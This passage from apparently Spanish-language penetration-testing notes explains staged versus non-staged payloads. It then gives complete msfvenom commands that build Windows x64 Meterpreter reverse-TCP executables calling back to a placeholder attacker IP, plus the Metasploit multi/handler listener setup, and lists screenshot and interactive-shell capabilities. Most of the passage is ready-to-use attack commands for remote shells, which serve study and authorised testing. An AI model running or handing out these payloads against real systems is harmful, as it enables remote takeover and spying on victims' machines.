4. Tipos de Payloads

Staged

• Características:
  • Carga dividida en fragmentos.
  • Menos estable, pero de menor tamaño.
  • Fácil de transmitir y personalizable.

Non-Staged

• Características:
  • Payload grande y monolítico.
  • Más rápido de ejecutar.
  • Menos dependiente del handler.

5. Creación de Payloads con Msfvenom

Staged Payload

1. Comando:

   msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64 LHOST=<IP_ATACANTE> LPORT=<PUERTO> -f <FORMATO> -o payload_staged.exe
   
   

2. Uso en Metasploit:

   • Iniciar base de datos:

     msfdb run
     
     

   • Configurar listener:

     use exploit/multi/handler
     set payload windows/x64/meterpreter/reverse_tcp
     set LHOST <IP_ATACANTE>
     set LPORT <PUERTO>
     run
     
     

   • Herramientas:

     • screenshot: Captura de pantalla.
     • shell: Consola interactiva.

Non-Staged Payload

1. Comando:

   msfvenom -p windows/x64/meterpreter_reverse_tcp --platform windows -a x64 LHOST=<IP_ATACANTE> LPORT=<PUERTO> -f <FORMATO> -o payload_nonstaged.exe
   
   

2. Configuración en Metasploit: Igual al payload staged, pero con:

   set payload windows/x64/meterpreter_reverse_tcp